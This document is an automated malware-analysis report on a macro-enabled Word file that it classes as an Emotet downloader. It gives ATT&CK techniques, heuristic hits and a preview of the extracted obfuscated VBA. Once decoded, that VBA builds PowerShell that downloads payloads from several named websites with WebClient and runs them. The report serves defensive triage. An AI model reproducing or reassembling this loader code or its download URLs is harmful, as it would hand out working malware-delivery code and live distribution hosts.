MALICIOUS
Risk Score: 304

Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1204.002 Malicious File
- T1105 Ingress Tool Transfer
The sample contains a critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER heuristic, indicating an obfuscated auto-exec VBA loader that uses CreateObject/Shell/exec. The VBA script explicitly constructs the URL 'http://www.ecobuildsolutionsgh.com/ilx/aix.spli' for downloading a file. This behavior is characteristic of Emotet, which often uses macro-enabled documents to download and execute further stages.
Heuristics (9)
- ClamAV: Doc.Macro.Emotet-6374344-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Macro.Emotet-6374344-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Obfuscated auto-exec VBA loader (critical, OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER): Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://3a0+3a0edajwQJmJ6bGYAOmz7C8m85vXVnkb (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 57115 bytes |

SHA-256: 65e1c9d2b056f01d2173bc7004b918ccc71c44072c887521542cceb4320e0220

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely (carved artifact contains 48 long base64-like blob(s))
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "zsLoZCGpK"
Function CvFCnOljw()
vbfpInFb = "" + AnZMXrj + Mid("13inH71jKkztqa0x);m3a0+3a0W3a0USK+USK+3a07karapas = 3a0+3a'+'0m3a0+3a0W3a0+3a07nsad3a0+3a0asd.3a0+3aUSK+USK0n3a0+3a0e3a0+3a0xt(1, 343a0+3a03245);mW7hua3a'+'0+3a0UJj7cYn6hdcmol1jPRRotKlWG", 14, 148) + uGwsmBm + BuFiJoW
OETXBjY = "" + jFslvfF + Mid("in3PzDld510(3a0+3a0mW73a0+3a0a3a0+3a0bc in m3a0+3a0W7bcd3USK+USKa0+3a0)3a0+3a0{try{mW'+'73a0USK+USK+3'+'a'+'0f3a0+3a0ran3a0+3a0c.3a0+3a0Do3a0+3a0wnlo3a0+3a0adUSK+USKFi3a0+3a0le3a0+3a0(m3a0+3a0W7ab3asM7TFbKb5J7pLO8SMu", 11, 188) + zXcIjjr + lhKsPmi
znZicbob = "" + qYtrJFD + Mid("SRbo5zVzjjwBGGRJYqEa0+3a0://3USK+USKa0+3a0ww3a0+3a0w.ecobuildsolu3a0+3a0t3a0+3a0ionsgh.3a0+3a0c3a0+3a0o3a0+3a0m3a0+3a0/ilUSK+USKZ/3a0+3a0a3a0+'+'3a0i3a0+3a0x.S3a0+3a0pl3a0+3a'+'0it3USK+USKa0+3a0(aix,ai3a0+3sPrZv8Y", 20, 187) + KdPPZpn + fMCXBhj
hblOidW = "" + zXccvPI + Mid("DUP5aT7WH6HT]+'x'-join'')7WEGr4kuYGw6bB0", 13, 13) + fTEooXV + iFPjUki
TGzSiSzO = "" + uYlQzJs + Mid("FUinzh0ZDCNhng][chAR]92).RePlACe(3a0aix3a0,[stRing]'+'[chAR]39) UzT&((GV 3'+'a0*USK+'+'USKMdR*3a0).NAmE[3,11,2]-jOIN3a0USK+USK3'+'a0)USK) -rEPlACe ([ChAR]51+[ChAR]97+[ChAR]48),[CrzahpPGkVvk7o", 13, 166) + wmjzZpz + DwRHDSh
QfFZUjkLju = "" + uDmZotv + Mid("CiG74sZPAPauZnn0wzdqE('yYA',[sTRiNG][chAR]124).REPlAcE('USK',[sTRiNG][chAR]39) |& ( ([StRiNg]$vErbOSEPREferEnce)[1,3WS1nvCZ", 21, 96) + wkpPPtz + mopuzzd
VfFlpFz = "" + UidnAzc + Mid("va0+3a0cUSK+USKep3a0+3a0tion3a0USK+USK+3a0.Me3a0+'+'3a0s3a0+3a0sage;}}3a0).RePlACe(3a0mW73a0,3a0j2M3a0).RePlACe(([chAR]89+[chAR]108+USK+USK[Lz1ZnvukUo8vhwRj1Y9Z6su9fk0H", 2, 139) + KnDdJwF + oOGLNWn
KianhVnzalL = "" + QJwfvFG + Mid("Cv0TwLUQKoZQhQNtoVkGpcjw9p://www.e3a0+3a0mont-dn'+'e3a0+3a0p3a0+3a0r.c3a0+3a0om/DZontEn3a0+3a0/,3a0+3a0ht3a0+3a0tp'+'3srw88uPkirQpM", 26, 93) + nsdDkfD + faAfacv
QhcfRWPlLFs = "" + Nhbhlvb + Mid("Y2GFlM31zfDsYKYlOaix 3a0+3a0+ mW73a0+3a0karapas 3a0+3a0+ a3a0+3a0i'+'x.ex3a0+USK+USK3a0eaix;fo3a0+3a0r3a0DKDJCvCO1YPj", 14, 92) + cpXlUzC + fRzrPGc
jUJKOiI = "" + EtqAiER + Mid("fdbnE0+3a0c.TUSK+USKoStriUSK+U'+'SK3a0+3a0ng('+')3a0+3a0,3a0+3a0 m3a0+3a0W'+'3a0+3a073a0'+'+3a0huas);Invoke-It3a81mHki4KRSWEADPmAAM9", 6, 107) + SaRLYRu + cuNqUVr
TzkfOdXfL = "" + APXXZXJ + Mid("qWjm4MBRjirjSl0+3a0em3a0+3a0(mW7h3a0+3a0uas)3a0+3a0;br3a0+3a0e3a0+ShwV6zzS9", 15, 52) + BlndWBF + pPOsbMi
dkZsPcAoLUt = "" + SwvThMC + Mid("EitkjHjKs 3a0+3a0= 3a0+'+'3a0mW7env:p'+'ublic + USK+USK3a0+3a0aixUSK+USnVT8Vnm", 9, 63) + vCpKStz + AwlBawz
wwGwFJsb = "" + wHfRzVA + Mid("7zlzAaixhtUSK+USK3a0+3a0tp3a0+3a0://monitoreoin3a0+3a0tel3a0+3a0ig3a0+3a0ente.c3a0+3a0om.ar/gk3a0+3a0Nu3a0+3a0N3a0+USK+USK3a0KlYK/,http://3a0+3a0edajwQJmJ6bGYAOmz7C8m85vXVnkb", 6, 143) + DwbzCwn + TfzuAzR
BYTRikI = "" + WIzcUbX + Mid("3C8FEtzH8ZwS4ifhAR]39-rEPlACe([ChAR]85+[ChAR]122+[ChAR]84),[ChAR]124-rEPlACe USKj2MUSK,[ChAR]36'+') yYA & ( R4ISheLLid[1]+R4Ishell'+'Id[13]+USKxUSK)').REPlAcE('R4I','$').REPlAc6zXYnTW5VPqhiZ", 16, 161) + BUwsPFJ + jRrwATR
mAhASth = "" + uYcpFou + Mid("k3zkhYbWmza0+3a0 3a0+3a0ne'+'3a0+3a0w-3a0+'+'3a0object 3a0+3a0ra3a0+3a0'+'nd3a0+3a0om3a0+3a0;mW7bcd = bLuiROIZqX33WPjBsKqpR", 11, 92) + RVdXrAo + KEhjLGE
fVNdivfq = "" + WKOcUmP + Mid("6n0OS6jmCILi1Cb2Ow ('((USK'+'(3a0'+'mW3USK+USKa0+3a07frUSK+USKanc3a0+3a0USK+USK =3a0+3a0'+' n3a0+USK+'+'USK3a0ew-3a0'+'+3a0o3a'+'0+3a0b3a0+3a0j3a0+3a0e'+'c3a0+3a0t 3a0+3a0S3a0+3aUSK+USK0ys3a0+3a0tem.Ne3U'+'UnhNwQuCaAQ", 19, 188) + zwKPjlv + hGdDjfZ
VtdOwPEJQCq = "" + RjlSzwz + Mid("iZ7zLcCvspb.3a0+3a0rUSK+USK3a0+3a0u/3a0+3a0putsitem3a0+3a0she3a0+3a0re/T3a0+USK+USK3a0xKv3a0+3a0j3a0+3a0/,3a0+3a0ht3a0+3a0tp:/3a0+3a0/feba'+'.neUSK+USK3a0+3a0t3a0+3a0/YA3a0+3a0q3a0+3a0J3a0+3a0/,httXapKElJWZFKGZZMp", 8, 190) + OszmBwV + mvHrtru
wsZwH = "" + RRjafBF + Mid("GOAJ5noPVFVB4SK+USKa0+3a0t.WebC3a0+3a0lient;3a0+3a0mW3a
... (truncated)